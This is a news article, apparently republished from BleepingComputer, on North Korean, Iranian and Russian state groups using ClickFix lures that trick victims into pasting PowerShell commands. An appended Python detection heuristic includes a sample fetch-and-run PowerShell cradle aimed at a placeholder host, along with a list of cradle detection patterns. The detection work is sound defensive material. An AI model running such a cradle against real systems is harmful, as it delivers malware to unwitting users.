ClickFix attacks are gaining traction among threat actors, with multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia adopting the technique in recent espionage campaigns.

Victims are then prompted to click a "Fix" button, which instructs them to run a PowerShell or command-line script, leading to the execution of malware on their devices.

Microsoft's Threat Intelligence team reported last February that the North Korean state actor 'Kimsuky' was also using it as part of a fake "device registration" web page.

A new report from Proofpoint reveals that, between late 2024 and early 2025, Kimsuky (North Korea), MuddyWater (Iran), and also APT28 and UNK_RemoteRogue (Russia) have all used ClickFix in their targeted espionage operations.

Starting with Kimsuky, the attacks were observed between January and February 2025, targeting think tanks focused on North Korea-related policy.

After establishing trust, the attackers sent a malicious PDF file linking to a fake secure drive that prompted the target to "register" by manually copying a PowerShell command into their terminal.

The MuddyWater attacks took place in mid-November 2024, targeting 39 organizations in the Middle East with emails disguised as Microsoft security alerts.

The third case concerns the Russian threat group UNK_RemoteRogue, which targeted two organizations closely related to a major arms manufacturer in December 2024.

Clicking on the embedded link took targets to a fake Microsoft Word page with instructions in Russian and a YouTube video tutorial.

Running the code executed JavaScript that launched PowerShell to connect to a server running the Empire command and control (C2) framework.

Proofpoint reports that APT28, a GRU unit, also used ClickFix as early as October 2024, using phishing emails mimicking a Google Spreadsheet, a reCAPTCHA step, and PowerShell execution instructions conveyed via a pop-up.

ClickFix remains an effective method, as evidenced by its adoption across multiple state-backed groups, driven by the lack of awareness of unsolicited command execution.

Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.
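As an added illustration (not code from the article, Proofpoint or Microsoft), the following detection heuristic runs over constructed process-creation records and flags the footprint a pasted ClickFix command leaves: PowerShell started from explorer.exe (the Run dialog) or cmd.exe with a download-and-execute cradle on its command line. The record format and the sample lines are assumptions modelled on Sysmon Event ID 1 fields.

```python
"""Heuristic detector for ClickFix-style execution in process-creation logs.
Records use a constructed 'key=value|key=value' format whose field names
(UtcTime, Image, ParentImage, CommandLine) mirror Sysmon Event ID 1."""
import re
from typing import Iterable

# Cradle fragments; two or more are required so a lone Invoke-WebRequest typed by an
# administrator does not fire the rule.
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\biex\b", r"invoke-expression", r"downloadstring", r"invoke-webrequest",
    r"\biwr\b", r"\bmshta\b", r"-w(indowstyle)?\s+hidden",
    r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
)]
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}  # Run dialog / pasted into a console
SHELLS = {"powershell.exe", "pwsh.exe"}

def parse_record(line: str) -> dict:
    """Split one constructed record into a field dictionary."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|"))

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def is_clickfix_like(event: dict) -> bool:
    """True when an interactive parent launches PowerShell with a cradle-like command."""
    if basename(event.get("Image", "")) not in SHELLS:
        return False
    if basename(event.get("ParentImage", "")) not in INTERACTIVE_PARENTS:
        return False
    cmd = event.get("CommandLine", "")
    return sum(1 for p in CRADLE_PATTERNS if p.search(cmd)) >= 2

def scan(lines: Iterable[str]) -> list[str]:
    """Return the UtcTime of every record that matches the heuristic."""
    return [ev["UtcTime"] for ev in map(parse_record, lines) if is_clickfix_like(ev)]

# Constructed sample records; not real telemetry from the campaigns in the article.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = [
    f"UtcTime=2025-01-14 09:12:03|Image={PS}|ParentImage=C:\\Windows\\explorer.exe"
    '|CommandLine=powershell -w hidden -c "iex (iwr http://example.invalid/c)"',
    f"UtcTime=2025-01-14 09:15:40|Image={PS}|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=powershell -NoProfile Get-ChildItem C:\\Temp",
    f"UtcTime=2025-01-14 09:20:11|Image={PS}|ParentImage=C:\\Windows\\System32\\services.exe"
    '|CommandLine=powershell -w hidden -c "iex (iwr http://example.invalid/c)"',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))  # ['2025-01-14 09:12:03']
```

Only the first record fires: the second has an interactive parent but no cradle, and the third has a cradle but a service parent, which is a different (scheduled or service-driven) execution path.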
This Cyber News was published on www.bleepingcomputer.com. Publication date: Mon, 21 Apr 2025 13:55:03 +0000